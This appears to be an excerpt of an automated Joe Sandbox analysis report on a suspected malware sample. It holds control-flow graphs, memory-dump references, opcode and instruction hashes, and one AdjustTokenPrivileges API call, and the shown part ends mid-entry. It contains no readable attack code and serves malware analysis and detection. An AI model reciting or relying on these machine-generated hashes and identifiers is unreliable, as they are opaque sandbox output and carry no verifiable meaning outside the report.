                      control_flow_graph 113 18b7e10-18b7e25 114 18b7e2c-18b7e6e 113->114 115 18b7e27 113->115 118 18b7e71 114->118 115->114 119 18b7e78-18b7e92 118->119 120 18b7e9b-18b7e9c 119->120 121 18b7e94 119->121 122 18b7ea1-18b7ebf 120->122 123 18b80e6-18b80eb 120->123 121->118 121->122 121->123 124 18b80a2-18b80a6 121->124 125 18b8080-18b8089 121->125 169 18b7ec4 call 1a105e0 122->169 170 18b7ec4 call 1a10606 122->170 171 18b7ec4 call 18b8620 122->171 128 18b80a8-18b80ba 124->128 129 18b80bc 124->129 126 18b808b-18b808e 125->126 127 18b8098-18b80a1 125->127 126->127 130 18b80bf-18b80c1 128->130 129->130 132 18b80cd 130->132 133 18b80c3-18b80cb 130->133 134 18b80d4-18b80e1 132->134 133->134 134->119 136 18b7eca-18b7f00 167 18b7f05 call 1a105e0 136->167 168 18b7f05 call 1a10606 136->168 140 18b7f0b-18b7fb3 152 18b7fba-18b7fc7 140->152 153 18b7fb5 140->153 154 18b7fc9 152->154 155 18b7fce-18b7fe0 152->155 153->152 154->155 156 18b7fe2 155->156 157 18b7fe7-18b7ff9 155->157 156->157 158 18b7ffb 157->158 159 18b8000-18b8047 157->159 158->159 163 18b8049-18b8059 159->163 164 18b805c-18b8062 159->164 163->164 166 18b806a-18b807b 164->166 166->119 167->140 168->140 169->136 170->136 171->136
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: T4c$T4c$\O'l$\O'l$\O'l
                      • API String ID: 0-1240238097
                      • Opcode ID: 9006400c40027a50007c655e8870543b08fc1a162241886f76bd6bea0c260bdb
                      • Instruction ID: d80c510abdf457a6c057c44f955a5b3cd4b9daed7f5fffefcbe2760b1094a323
                      • Opcode Fuzzy Hash: 9006400c40027a50007c655e8870543b08fc1a162241886f76bd6bea0c260bdb
                      • Instruction Fuzzy Hash: 5691CF74E00218DFDB14DFA9D988AEDBBF2BF89301F148069E819AB754DB319945CF21
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 172 18b8ddc-18b8df0 173 18b8df2-18b8e08 172->173 174 18b8e46-18b8e49 172->174 175 18b8e0a 173->175 176 18b8e0f-18b8e1d 173->176 177 18b8e4a-18b8e64 174->177 175->176 178 18b8e1f-18b8e31 176->178 179 18b8e33 176->179 180 18b8e6d-18b8e6e 177->180 181 18b8e66 177->181 182 18b8e36-18b8e3d 178->182 179->182 183 18b8fdf-18b8fe0 180->183 184 18b8e73-18b8ec3 180->184 181->183 181->184 185 18b8f0b-18b8f1a 181->185 186 18b8f7f-18b8f91 181->186 187 18b8f1f-18b8f30 181->187 188 18b8f4e-18b8f5a 181->188 189 18b8e43 181->189 190 18b8ee1-18b8eed 181->190 191 18b8f96-18b8fa8 181->191 192 18b8ec5-18b8edc 181->192 182->189 182->190 183->190 184->177 185->177 186->177 201 18b8f3c 187->201 202 18b8f32-18b8f3a 187->202 203 18b8f5c-18b8f64 188->203 204 18b8f66 188->204 189->174 205 18b8ef9 190->205 206 18b8eef-18b8ef7 190->206 208 18b8fb0-18b8fb9 191->208 192->177 209 18b8f43-18b8f49 201->209 202->209 210 18b8f6d-18b8f7a 203->210 204->210 211 18b8f00-18b8f06 205->211 206->211 213 18b8fc0-18b8fda 208->213 209->177 210->177 211->177 213->177
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: b$2'l$2'l
                      • API String ID: 0-3887907858
                      • Opcode ID: 03dd0f03deb433785969330e79f0a62dafa47a835d29c70606f24709dae2b9fd
                      • Instruction ID: b552567f7d0687dc841b7017ec70dbdea185e0076ce60670bb83aecd62027335
                      • Opcode Fuzzy Hash: 03dd0f03deb433785969330e79f0a62dafa47a835d29c70606f24709dae2b9fd
                      • Instruction Fuzzy Hash: DD514270D0620ACFDB05CFA4C5856EEBBB6BF4A314F18986AD002BB750D7348A45CBA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 216 18b8df8-18b8e08 217 18b8e0a 216->217 218 18b8e0f-18b8e1d 216->218 217->218 219 18b8e1f-18b8e31 218->219 220 18b8e33 218->220 221 18b8e36-18b8e3d 219->221 220->221 222 18b8e43-18b8e49 221->222 223 18b8ee1-18b8eed 221->223 225 18b8e4a-18b8e64 222->225 229 18b8ef9 223->229 230 18b8eef-18b8ef7 223->230 227 18b8e6d-18b8e6e 225->227 228 18b8e66 225->228 232 18b8fdf-18b8fe0 227->232 233 18b8e73-18b8ec3 227->233 228->222 228->223 228->232 228->233 234 18b8f0b-18b8f1a 228->234 235 18b8f7f-18b8f91 228->235 236 18b8f1f-18b8f30 228->236 237 18b8f4e-18b8f5a 228->237 238 18b8f96-18b8fb9 228->238 239 18b8ec5-18b8edc 228->239 231 18b8f00-18b8f06 229->231 230->231 231->225 232->223 233->225 234->225 235->225 247 18b8f3c 236->247 248 18b8f32-18b8f3a 236->248 249 18b8f5c-18b8f64 237->249 250 18b8f66 237->250 256 18b8fc0-18b8fda 238->256 239->225 253 18b8f43-18b8f49 247->253 248->253 254 18b8f6d-18b8f7a 249->254 250->254 253->225 254->225 256->225
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: b$2'l$2'l
                      • API String ID: 0-3887907858
                      • Opcode ID: 0da02e1ad2dbd9931a966b1b75414e6dfaf323f3a73cd4f76d826880a7e42886
                      • Instruction ID: 5dcc83fbdee2e1ef31e319894de7982ae0c0325ef43ba69c8a4b261daf05822e
                      • Opcode Fuzzy Hash: 0da02e1ad2dbd9931a966b1b75414e6dfaf323f3a73cd4f76d826880a7e42886
                      • Instruction Fuzzy Hash: 5D513270D0521ACFDB04DFA5C5846EEBBB6BF4A318F14982AD102BB340D7349A44CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 272 18b4a0b-18b4a24 273 18b4a6c-18b4a77 272->273 274 18b4a26-18b4a53 272->274 277 18b4a7f 273->277 275 18b4a5a-18b4a6b 274->275 276 18b4a55 274->276 275->273 276->275 278 18b4a86-18b4aa0 277->278 279 18b4aa9-18b4aaa 278->279 280 18b4aa2 278->280 284 18b4aaf-18b4acd 279->284 297 18b4dfb-18b4dff 279->297 280->277 281 18b4b6a-18b4b6e 280->281 282 18b4c29-18b4c40 280->282 283 18b4d28-18b4d34 280->283 280->284 285 18b4acf-18b4ae4 280->285 286 18b4cee-18b4d01 280->286 287 18b4b8c-18b4b9c 280->287 288 18b4dac-18b4db8 280->288 289 18b4b42-18b4b65 280->289 290 18b4c62-18b4c66 280->290 291 18b4ba1-18b4bb4 280->291 292 18b4be0-18b4bf3 280->292 293 18b4d06-18b4d0a 280->293 294 18b4ae6-18b4af2 280->294 295 18b4cc4-18b4cd0 280->295 296 18b4c84-18b4c98 280->296 280->297 298 18b4d5a-18b4d66 280->298 299 18b4bb9-18b4bc2 280->299 300 18b4bf8-18b4c24 280->300 301 18b4b18-18b4b24 280->301 302 18b4c9d-18b4cad 280->302 303 18b4cb2-18b4cbf 280->303 306 18b4b7a 281->306 307 18b4b70-18b4b78 281->307 345 18b4c42 call 1a105e0 282->345 346 18b4c42 call 18b4fb8 282->346 347 18b4c42 call 1a10606 282->347 308 18b4d3b-18b4d55 283->308 309 18b4d36 283->309 284->278 285->278 286->278 287->278 318 18b4dba 288->318 319 18b4dbf-18b4dd5 288->319 289->278 314 18b4c68-18b4c70 290->314 315 18b4c72 290->315 291->278 292->278 304 18b4d0c-18b4d14 293->304 305 18b4d16 293->305 316 18b4af9-18b4b13 294->316 317 18b4af4 294->317 320 18b4cd2 295->320 321 18b4cd7-18b4ce9 295->321 296->278 312 18b4d68 298->312 313 18b4d6d-18b4d83 298->313 310 18b4bce 299->310 311 18b4bc4-18b4bcc 299->311 300->278 322 18b4b2b-18b4b3d 301->322 323 18b4b26 301->323 302->278 303->278 325 18b4d1d-18b4d23 304->325 305->325 326 18b4b81-18b4b87 306->326 307->326 308->278 309->308 327 18b4bd5-18b4bdb 310->327 311->327 312->313 338 18b4d8a-18b4da7 313->338 339 18b4d85 313->339 331 18b4c79-18b4c7f 314->331 315->331 316->278 317->316 318->319 341 18b4ddc-18b4df6 319->341 342 18b4dd7 319->342 320->321 321->278 322->278 323->322 325->278 326->278 327->278 330 18b4c48-18b4c5d 330->278 331->278 338->278 339->338 341->278 342->341 345->330 346->330 347->330
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: FFb$z:P
                      • API String ID: 0-1799881367
                      • Opcode ID: 2e9fd5aa3a514f4de86d7b334c31198142a6e61780ef6a77a45960f415fb7511
                      • Instruction ID: 8f55073b9f7fd092f846735a3145341931688375139e98c8a17325d23185de53
                      • Opcode Fuzzy Hash: 2e9fd5aa3a514f4de86d7b334c31198142a6e61780ef6a77a45960f415fb7511
                      • Instruction Fuzzy Hash: 4EC1497090520ADFCB04CFA8D6858EEFBB1FF49315B24A559D402AB316D734AB81CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 348 18b4a40-18b4a53 349 18b4a5a-18b4a77 348->349 350 18b4a55 348->350 352 18b4a7f 349->352 350->349 353 18b4a86-18b4aa0 352->353 354 18b4aa9-18b4aaa 353->354 355 18b4aa2 353->355 359 18b4aaf-18b4acd 354->359 372 18b4dfb-18b4dff 354->372 355->352 356 18b4b6a-18b4b6e 355->356 357 18b4c29-18b4c40 355->357 358 18b4d28-18b4d34 355->358 355->359 360 18b4acf-18b4ae4 355->360 361 18b4cee-18b4d01 355->361 362 18b4b8c-18b4b9c 355->362 363 18b4dac-18b4db8 355->363 364 18b4b42-18b4b65 355->364 365 18b4c62-18b4c66 355->365 366 18b4ba1-18b4bb4 355->366 367 18b4be0-18b4bf3 355->367 368 18b4d06-18b4d0a 355->368 369 18b4ae6-18b4af2 355->369 370 18b4cc4-18b4cd0 355->370 371 18b4c84-18b4c98 355->371 355->372 373 18b4d5a-18b4d66 355->373 374 18b4bb9-18b4bc2 355->374 375 18b4bf8-18b4c24 355->375 376 18b4b18-18b4b24 355->376 377 18b4c9d-18b4cad 355->377 378 18b4cb2-18b4cbf 355->378 381 18b4b7a 356->381 382 18b4b70-18b4b78 356->382 420 18b4c42 call 1a105e0 357->420 421 18b4c42 call 18b4fb8 357->421 422 18b4c42 call 1a10606 357->422 383 18b4d3b-18b4d55 358->383 384 18b4d36 358->384 359->353 360->353 361->353 362->353 393 18b4dba 363->393 394 18b4dbf-18b4dd5 363->394 364->353 389 18b4c68-18b4c70 365->389 390 18b4c72 365->390 366->353 367->353 379 18b4d0c-18b4d14 368->379 380 18b4d16 368->380 391 18b4af9-18b4b13 369->391 392 18b4af4 369->392 395 18b4cd2 370->395 396 18b4cd7-18b4ce9 370->396 371->353 387 18b4d68 373->387 388 18b4d6d-18b4d83 373->388 385 18b4bce 374->385 386 18b4bc4-18b4bcc 374->386 375->353 397 18b4b2b-18b4b3d 376->397 398 18b4b26 376->398 377->353 378->353 400 18b4d1d-18b4d23 379->400 380->400 401 18b4b81-18b4b87 381->401 382->401 383->353 384->383 402 18b4bd5-18b4bdb 385->402 386->402 387->388 413 18b4d8a-18b4da7 388->413 414 18b4d85 388->414 406 18b4c79-18b4c7f 389->406 390->406 391->353 392->391 393->394 416 18b4ddc-18b4df6 394->416 417 18b4dd7 394->417 395->396 396->353 397->353 398->397 400->353 401->353 402->353 405 18b4c48-18b4c5d 405->353 406->353 413->353 414->413 416->353 417->416 420->405 421->405 422->405
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: FFb$z:P
                      • API String ID: 0-1799881367
                      • Opcode ID: 2586d1bfd19fd894fcc6fe6aadab935407a5e916e00d0543d9d1293372c5174d
                      • Instruction ID: 00daae958af23d8ca56a6e2828792a184db9a6fe0274ef14fc59925e1bc19b71
                      • Opcode Fuzzy Hash: 2586d1bfd19fd894fcc6fe6aadab935407a5e916e00d0543d9d1293372c5174d
                      • Instruction Fuzzy Hash: 0CC1047090520ADFCB04CFA8D6858EEFBB5FF48315B24A559D402AB316D734AB81CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 478 12da97f-12da9e3 482 12da9e8-12da9f7 478->482 483 12da9e5 478->483 484 12da9f9-12daa19 AdjustTokenPrivileges 482->484 485 12daa3a-12daa3f 482->485 483->482 488 12daa1b-12daa37 484->488 489 12daa41-12daa46 484->489 485->484 489->488
                      APIs
                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012DA9FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: AdjustPrivilegesToken
                      • String ID:
                      • API String ID: 2874748243-0
                      • Opcode ID: 96c03fb66df7dbd06844dd8bbc3120562f9e221fc34d3753ee3384a4de12be0e
                      • Instruction ID: 8a26dad37bb287e0a9ef53418b3e3452fd6ba09d21066bb2ba30c9a3196b916d
                      • Opcode Fuzzy Hash: 96c03fb66df7dbd06844dd8bbc3120562f9e221fc34d3753ee3384a4de12be0e
                      • Instruction Fuzzy Hash: 73219F755097809FEB238F25DC44F52BFB4EF06210F0985DAE9858B563D2719908DB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 012DA9FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1653887732.00000000012DA000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_12da000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID: AdjustPrivilegesToken
                      • String ID:
                      • API String ID: 2874748243-0
                      • Opcode ID: 4338bab725806c00f0bdd52d29f5ad364eeae14013e3dff2a599810528aa7ed7
                      • Instruction ID: 26badefb1916e7460c253e06cfa789e9f5675570bc7d7e75d36604a0e9034ded
                      • Opcode Fuzzy Hash: 4338bab725806c00f0bdd52d29f5ad364eeae14013e3dff2a599810528aa7ed7
                      • Instruction Fuzzy Hash: CC11C2756002009FEB21CF55D945F66FBE4EF08220F08C9AAEE858B652D371E408DF62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: pV
                      • API String ID: 0-2768523175
                      • Opcode ID: 34ec2e3c71f914c97b6024b5c492b82167f5ca659a4630c0610ac17aad069e37
                      • Instruction ID: a79fc3da95add93c1ae4230549d373a8fa9f01f32c4a0a8c573dfc58d1f723cf
                      • Opcode Fuzzy Hash: 34ec2e3c71f914c97b6024b5c492b82167f5ca659a4630c0610ac17aad069e37
                      • Instruction Fuzzy Hash: 64C13776D0520ADFCB04CFA4C6848AEFBB2FF49354B249559D502BB354D730AA82CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID: _qjf
                      • API String ID: 0-3705308623
                      • Opcode ID: aae7549daaa2ed5ea4a150c583296350f6b202a66159e3017fbf517e91e82d4e
                      • Instruction ID: 1d1de1a8661c27678baf9fec20d943286e2998b53f6b30b2e923490e3b0d8d26
                      • Opcode Fuzzy Hash: aae7549daaa2ed5ea4a150c583296350f6b202a66159e3017fbf517e91e82d4e
                      • Instruction Fuzzy Hash: CE3118B1D016188BDB18CFA6D9446DEBBF2EFC9310F14C06AD409AA224D7755A46CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7004a1805f6ca3f74cf6a8c5927259744ea4f5cfc50e9e8f76b8ae153bc7fde1
                      • Instruction ID: d9efa5f961f89e1dbb58541c179883ae6b356725fe72e68cc0be3449c51ef598
                      • Opcode Fuzzy Hash: 7004a1805f6ca3f74cf6a8c5927259744ea4f5cfc50e9e8f76b8ae153bc7fde1
                      • Instruction Fuzzy Hash: 7AE1C276E40B459BD700CF658C46B9AFBB1BF45702F0AC2A5E608AF2D2D7708981CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e4b366ae667866556902ee5364738fc345676f1a01d10161ac439d4c88a46cc1
                      • Instruction ID: 311daad74691b5e464f3a18bb703f68d652b2dc6b51d828395bf626f2c764098
                      • Opcode Fuzzy Hash: e4b366ae667866556902ee5364738fc345676f1a01d10161ac439d4c88a46cc1
                      • Instruction Fuzzy Hash: 7AB16B75E04609EFDB04CFA5C885AAEBBB2FF98301F10806AD506AB394D7709A41CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a2b5125d5544a2e18cb2621f62e3daffff55455f81f3b4f7ab168a437f6ea302
                      • Instruction ID: b91e2d43e4066ce461af63f36a0210dd3f48bebf0f91f82ce6b71ba14c14bda4
                      • Opcode Fuzzy Hash: a2b5125d5544a2e18cb2621f62e3daffff55455f81f3b4f7ab168a437f6ea302
                      • Instruction Fuzzy Hash: 97C1227090620ADFCB04CFA4D6848EEBBF1FF49314B669559D806AB314D734AB81CFA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 598078a521e353631dadbf5a7b8f6f96bc9c02cc3cd688c0b2d7e296268e5373
                      • Instruction ID: 9e780a79813b55fa752f5d2d5a733dec9982252a7938b9600830c504f4b846f3
                      • Opcode Fuzzy Hash: 598078a521e353631dadbf5a7b8f6f96bc9c02cc3cd688c0b2d7e296268e5373
                      • Instruction Fuzzy Hash: 76B1F075E05209DFDB04CFA9C585AEEBBF2FF89304F24806AD405AB314DB34AA41CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0f12d5204eb05b3aef6704e49b781602f185ddfce5c1d90ce27da551c5ddd5e2
                      • Instruction ID: fcb4530e78df0313e6c31e0691cd2270eb6aa7625009185fd6c34fc930f79a42
                      • Opcode Fuzzy Hash: 0f12d5204eb05b3aef6704e49b781602f185ddfce5c1d90ce27da551c5ddd5e2
                      • Instruction Fuzzy Hash: A2918C75E406589BDB04CFA6CC45BDABBF2BF89301F05C5A9E508AB391E7709A81CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d096cdc46ae7c14b7dd390d021ed24c6c24e349d592926b72bcad6ba40aa5982
                      • Instruction ID: 2bd33bb77c3ad377685ea0593be44d3b00e3bdc0a15cc913f3fa41a5850454bc
                      • Opcode Fuzzy Hash: d096cdc46ae7c14b7dd390d021ed24c6c24e349d592926b72bcad6ba40aa5982
                      • Instruction Fuzzy Hash: 29915B75E006589BDB14CF6ACC45BDABBF2BF89301F05C1A9E508AB391DB749A81CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b1b2acfad35223f835b290fb121ddbfe263361302e82db6cc7e72b8824eee28
                      • Instruction ID: b5ca8efaefd7129e4f3bb77a942f0913f1b952389a0ed47b1b8d0ebc81552846
                      • Opcode Fuzzy Hash: 7b1b2acfad35223f835b290fb121ddbfe263361302e82db6cc7e72b8824eee28
                      • Instruction Fuzzy Hash: F991B0B5E15209DFDB14CFA9C584AEEBBF2FF89304F20906AD405AB354DB34AA41CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b9199a37018cd164df3c02c40bf64f1ef61645bbf0fc5b1564c72a5377c70e44
                      • Instruction ID: 7dafe8815f61958cdc758c7997b692f3f97a929a2f40593f2a154fd1fd8fee72
                      • Opcode Fuzzy Hash: b9199a37018cd164df3c02c40bf64f1ef61645bbf0fc5b1564c72a5377c70e44
                      • Instruction Fuzzy Hash: 1691C375E05209DFDB04CFE5C5859AEBBB2FF99304F20806AD406AB354D7359A42CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 73ecf34dee2d9f8df0c4fad861964e45a80b7283cae8fddac0b69398f3f65414
                      • Instruction ID: 7a77c354cdbbbf83059ecc4f981c802688ba7b8d4a2dfbb062721553f59109c8
                      • Opcode Fuzzy Hash: 73ecf34dee2d9f8df0c4fad861964e45a80b7283cae8fddac0b69398f3f65414
                      • Instruction Fuzzy Hash: 9F91CDB4E05209DFDB04DFA9D5849EEBBF2FF89304F20846AD516AB314D7349A42CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bad9eb7fdec71935583a44879b5237d78556e46941bfe1904abdb629473f08b2
                      • Instruction ID: 04f80de2f5135dea1473ed122b65c5de5c995d5ff88ab8a9e522c929c8db35ec
                      • Opcode Fuzzy Hash: bad9eb7fdec71935583a44879b5237d78556e46941bfe1904abdb629473f08b2
                      • Instruction Fuzzy Hash: E991BDB4E05209DFDB04DFE9D585AEEBBF2FB89304F20842AD515AB314D7349A42CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 63776dc4f2ea6d78ab520ff5f0a5b59d1f60f9d82171334bdc8df579b3567d5d
                      • Instruction ID: 43494f3ab76229953412a35b71fcd3a7ebcb2afa57250ae1e22cae41a1ca5e34
                      • Opcode Fuzzy Hash: 63776dc4f2ea6d78ab520ff5f0a5b59d1f60f9d82171334bdc8df579b3567d5d
                      • Instruction Fuzzy Hash: ED91D4B4D01218CFCF64DFA4E5886ADBBB2FF88305F24806AE909A7314DB355A85CF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b19ee6568546d07ff08e7810fa3cc6451e86cd2e56ed647959ae73d4d79319ba
                      • Instruction ID: e1c65143dc4154d69b71bf1bfbd75882c8e456245377e8807e8d621f1f347920
                      • Opcode Fuzzy Hash: b19ee6568546d07ff08e7810fa3cc6451e86cd2e56ed647959ae73d4d79319ba
                      • Instruction Fuzzy Hash: 61518BB1E057548FE719CF678C4079ABBF3AFC5210F19C1FA9448AA265EB740A85CF11
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_56a0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b3eb2c095baee34a194ff851f31246a6c9afd058a097a07400ec0dc14843757
                      • Instruction ID: e3e676fe0c2b6adf2fb1eaf3b6c4a92415f9c2096438c5bfa95bb05e37b90dd0
                      • Opcode Fuzzy Hash: 4b3eb2c095baee34a194ff851f31246a6c9afd058a097a07400ec0dc14843757
                      • Instruction Fuzzy Hash: 61512472D05219CFCB08CFA6C5445AEFBF2FF89210F14D16AD41AAB220D3359A42CF68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1654694929.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_18b0000_lqoUUYTMsL.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 14c65111970e67698c143e26875d8add49edcfb46b7cffefbe2f45598c1dcbf8
                      • Instruction ID: 3db9609c6eda99dd812972c5760fe759dc031180c6909295a29d13f204cea633
                      • Opcode Fuzzy Hash: 14c65111970e67698c143e26875d8add49edcfb46b7cffefbe2f45598c1dcbf8
                      • Instruction Fuzzy Hash: F5511074E042098BCB08CFAAD5846EEBBF2FB89305F14C16AD815AB354DB349A41CF65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.1656098869.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                      Joe Sandbox IDA Plugin
